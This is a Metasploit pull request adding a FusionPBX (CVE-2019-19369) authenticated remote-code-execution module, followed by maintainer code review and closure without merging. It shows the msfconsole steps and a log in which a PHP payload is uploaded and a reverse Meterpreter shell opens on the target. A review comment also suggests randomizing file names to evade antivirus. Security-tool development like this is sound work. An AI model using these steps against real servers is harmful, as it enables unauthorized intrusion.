Add CVE-2019-19369 FusionPBX 4.5.10 exploit
rapid7/metasploit-framework pull request #12868
Opened 2020-01-21 10:16 UTC by TheCyberGeek

Add CVE-2019-19369 FusionPBX 4.5.10 exploit.

```
CVE-2019-19369
FusionPBX =< 4.5.10 Authenticated Remote Code Execution.
This module exploits FusionPBX versions =< 4.5.10 by abusing 
the PHP-Editor function, authenticated attackers can replace PHP
scripts with a trojan horse and can execute by visiting the changed file.

Tested on: 
Ubuntu 18.04
```

Verification

Do:

    use exploit/linux/http/fusionpbx_php_editor_cmd_exec
    set RHOST target_ip
    set RPORT 443
    set SSL true
    set USERNAME login_username
    set PASSWORD login_password
    exploit

```
root@TheCyberGeek:~/# msfconsole
msf5 > use exploit/linux/http/fusionpbx_php_editor_cmd_exec
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set RHOST 192.168.0.48
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set RPORT 443
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set SSL true
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set USERNAME admin
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set PASSWORD fusion
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > exploit
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.0.12:4444 
[+] Login Successful!
[*] 192.168.0.48:443 - Sending PHP payload (/var/www/fusionpbx/project_root.php)
[+] Uploaded Successfully!
[*] 192.168.0.48:443 - Executing project_root.php...
[*] Sending stage (38288 bytes) to 192.168.0.48
[*] Meterpreter session 2 opened (192.168.0.12:4444 -> 192.168.0.48:51374) at 2020-01-20 07:22:05 +0000

meterpreter > getuid
Server username: www-data (33)
meterpreter > 

```

2020-01-21 22:18 UTC, h00die requested changes

2020-01-21 22:18 UTC, h00die commented on documentation/modules/exploit/linux/http/fusionpbx_php_editor_cmd_exec.md
> +```
Add an h3 here with what version youre showing exploitation against. Something like ### FusionPBX 4.5.9

2020-01-21 22:18 UTC, h00die commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +        "Arch"		=> ARCH_PHP,
spacing?

2020-01-21 22:18 UTC, h00die commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +        "Name" => "FusionPBX =< 4.5.10 Authenticated Remote Code Execution",
Module names shouldn't include a version number.  I would opt to call this something more like "FusionPBX PHPEditor Authenticated Remote Code Execution" or similar.

2020-01-21 22:18 UTC, h00die commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +          Vendor verified: 11/27/2019
The dates can be removed, theyre covered in the disclosure date field

2020-01-21 22:18 UTC, h00die commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +            ['CVE','2019-19369']
I saw a tweet saying this was on EDB, but I can't seem to find it.  Was it ever put there, if so add it here as well.

2020-01-21 22:18 UTC, h00die commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +          Affected versions: =< 4.5.10
Their git page seems to only go to 4.4.1, where did 4.5.10 come from?

2020-01-21 22:18 UTC, h00die commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +
Is it possible to include a `check` command?  Is the version number of the application disclosed anywhere that you could pull?  Maybe even just checking the login page says 'fusionpbx' would suffice at a VERY minimum?

2020-01-21 22:18 UTC, h00die commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +    payload_name = '/var/www/fusionpbx/project_root.php'
Could this be randomized, or set by the user (with default to randomize)?  If the root path is set, even just letting them specify the php name or randomly setting it would help avoid AV

2020-01-21 22:18 UTC, h00die commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +    print_status("#{peer} - Sending PHP payload (#{payload_name})")
Saving may be the better verb here

2020-01-21 22:18 UTC, h00die commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +      'uri'    => normalize_uri(target_uri.path, "/project_root.php")
`/#{fname}`

2020-01-21 22:20 UTC, h00die commented
You'll also want to run `tools/dev/msftidy.rb <file>` and correct whatever items it brings up

2020-01-22 11:30 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +
There is a system config page in settings that displays version numbers. I will add the check shortly.

2020-01-22 11:31 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +    payload_name = '/var/www/fusionpbx/project_root.php'
I mean sure but in order for the site to maintain functionality I opted to not allow users to select locations.

2020-01-22 19:40 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +          Affected versions: =< 4.5.10
![unknown](https://user-images.githubusercontent.com/52138157/72927882-ecee3900-3d4e-11ea-8a86-45806f0c19c6.png)
They don't seem to update the branches anymore.

2020-01-22 19:49 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +            ['CVE','2019-19369']
No not for this. I only have CVE-2019-16405 on EDB.

2020-01-22 19:50 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +    print_status("#{peer} - Sending PHP payload (#{payload_name})")
Ok I'll make the change.

2020-01-22 19:52 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +        "Name" => "FusionPBX =< 4.5.10 Authenticated Remote Code Execution",
Changing to your suggestion in next commit.

2020-01-22 19:52 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +          Vendor verified: 11/27/2019
Ok, they will be gone in the next commit.

2020-01-22 19:58 UTC, TheCyberGeek commented on documentation/modules/exploit/linux/http/fusionpbx_php_editor_cmd_exec.md
> +Do:
Ok, I'll change it for the next commit.

2020-01-22 21:56 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +
Check added

2020-01-22 22:20 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +    payload_name = '/var/www/fusionpbx/project_root.php'
I tried this, but the edit cannot alter filenames or add files. For the sake of the sites functionality I will leave it the same.

2020-01-22 22:22 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +
I thought it would be appropriate to check if the PHP editor exists rather then the version, I originally discovered this on version 4.4.5.

2020-01-25 07:08 UTC, bcoles commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +          version
Abstracting this away into a separate method is kind of confusing. It's also strange that this has its own method as this code is only used once.

Comparatively, the login functionality has not been abstracted into its own method, despite duplicating the exact same code in both the `check` and `exploit` methods.

2020-01-25 07:08 UTC, bcoles commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +####################################################################
Please use the standard header.

2020-01-25 07:08 UTC, bcoles commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +        "Stance" => Msf::Exploit::Stance::Aggressive,
This isn't accurate for a PHP file upload+exec module, and isn't required.

```suggestion
```

2020-01-25 07:08 UTC, bcoles commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +          By using the on site PHP-Editor function users can overwrite PHP files on the web server
Please describe the user roles which are required to exploit this issue. 

Presumable some specific user roles are required to edit files, rather than any authenticated user. FusionPBX makes use of a bunch of different user roles. While the documentation isn't great, the roles are usually easily identified in the source code.

2020-01-25 14:04 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +####################################################################
This isn't the standard header?

2020-01-25 14:06 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +  def check
Ok I will re-code this making sure the CheckCode is in check command.

2020-01-25 14:10 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +          version
Ok, I think I understand what you mean, I will create a login function, remove the version function and then in the check function, declare login, then add the version code so CheckCode is in the check function.

2020-01-25 14:11 UTC, TheCyberGeek commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +          By using the on site PHP-Editor function users can overwrite PHP files on the web server
I will check the source codes and update on my next commit.

2020-01-25 14:22 UTC, bcoles commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +####################################################################
Correct. It is not the standard header. This is the standard header:

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
```

2020-01-27 22:36 UTC, h00die commented
You still need to run msftidy against your code.
```
modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb:131 - [WARNING] Spaces at EOL
modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb:179 - [WARNING] Spaces at EOL
```

2020-02-22 18:36 UTC, BrennerLittle commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +  end
Fixes spaces at EOL.
```suggestion
  end
```

2020-02-22 18:37 UTC, BrennerLittle commented on modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
> +
Fixes spaces at EOL.
```suggestion

```

2020-04-13 19:43 UTC, smcintyre-r7 commented
Thanks for your interest in contributing to the Metasploit Framework. It doesn't look like there's been any activity on this Pull Request in quite some time, and there are outstanding requests for changes which would prevent us from accepting the contribution in its current state.

I'm going to go ahead and tag this as `attic` and close this out for the time being. If you have a chance to address the comments, we'd be happy to reopen and discuss merging this contribution into the framework. Thanks alot!

See: msftidy and check method comments.

2020-04-13 19:43 UTC, closed without merging